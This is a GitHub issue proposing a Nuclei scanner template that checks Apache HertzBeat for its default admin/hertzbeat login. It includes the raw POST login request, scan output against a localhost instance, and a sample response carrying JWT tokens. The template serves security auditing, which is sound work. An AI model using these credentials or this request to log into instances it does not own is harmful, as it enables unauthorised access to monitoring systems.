### ISSUE TITLE
Template for Apache hertzbeat default login

### ISSUE THREAD

**Issue by securitytaters** [projectdiscovery/nuclei-templates#10638]
### Template Information:

[Apache HertzBeat](https://github.com/apache/hertzbeat) (incubating) is an easy-to-use, open source, real-time monitoring system with agentless, high performance cluster, prometheus-compatible, offers powerful custom monitoring and status page building capabilities.
Their installation guide shows default login credentials for all their installations. 
https://github.com/apache/hertzbeat?tab=readme-ov-file#1install-quickly-via-docker 

Template link
https://github.com/securitytaters/nuclei-templates/blob/main/default-cred-hertzbeat.yaml

### Nuclei Template:

```yaml
id: apache-hertzbeat-default-login

info:
  name: Apache HertzBeat Default Credentials
  author: securitytaters
  severity: high
  description: Apache HertzBeat enables default admin credentials. An attacker can execute unauthorized operations.
  reference:
    - https://github.com/apache/hertzbeat?tab=readme-ov-file#1install-quickly-via-docker
  tags: hertzbeat,default-login

variables:
  username: admin
  password: hertzbeat

http:
  - raw:
      - |-
        POST /api/account/auth/form HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"type":0,"identifier":"{{username}}","credential":"{{password}}"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"token":"eyJ'
      - type: status
        status:
          - 200

```

Template results
```
[INF] Current nuclei version: v3.3.1 (latest)
[INF] Current nuclei-templates version: v9.9.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 56
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[VER] [apache-hertzbeat-default-login] Sent HTTP request to http://localhost:1157/api/account/auth/form
[apache-hertzbeat-default-login] [http] [high] http://localhost:1157/api/account/auth/form
```

Sample response
```
HTTP/1.1 200 
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Content-Type: application/json
Date: Sat, 31 Aug 2024 10:39:55 GMT
Keep-Alive: timeout=60
Connection: keep-alive
Content-Length: 651

{"data":{"token":"eyJhbGciOiJIUzUxMiIsInppcCI6IkRFRiJ9.eJw1jMsKwyAQRf9l1hkYjZrHr5QuNBnBPkxxTCmU_nsNtMtz7uW84VITzDDqEGJ0C1K0Co1bA45kCNepd4vXZIMm6ED20M5-vafcKIk0kr1wZhGs25UzCpcnl2P1FWY1aKuIhsl2wK_HX5j-EGW7cSucfsHz5wth1ikr.InqOLuJyBG23NtA0qy0Z_Us_TGY832TiV22qP7ofYqxy7bbzgylPN6SQ56HRDhx3VCxJcvvYRUk5_hNtMmmTmw","refreshToken":"eyJhbGciOiJIUzUxMiIsInppcCI6IkRFRiJ9.eJwliksOAiEQBe_S6yHhMy00t0GnJ6IRDQ0TE-Pdhbh4i6p6H7i1DBHoEmhOnQidWi2uKu0mKEabnCOvg95gAenncU7bI5dBWWSQ9MqFRVR73rko4XpwnTU1iMZbNFp7wgX4_foLa5CmqLxXlivEVjt_f48TJ_g.LWb5oJwxklG2Rv3vVZxs3a79AMlZ7x2Ia1ZUb_qcvzNpuMb-aWIffVSMe_dfe6CdF9eQAGyvJH899ruG2N3SQw","role":"[\"admin\"]"},"msg":null,"code":0}
```
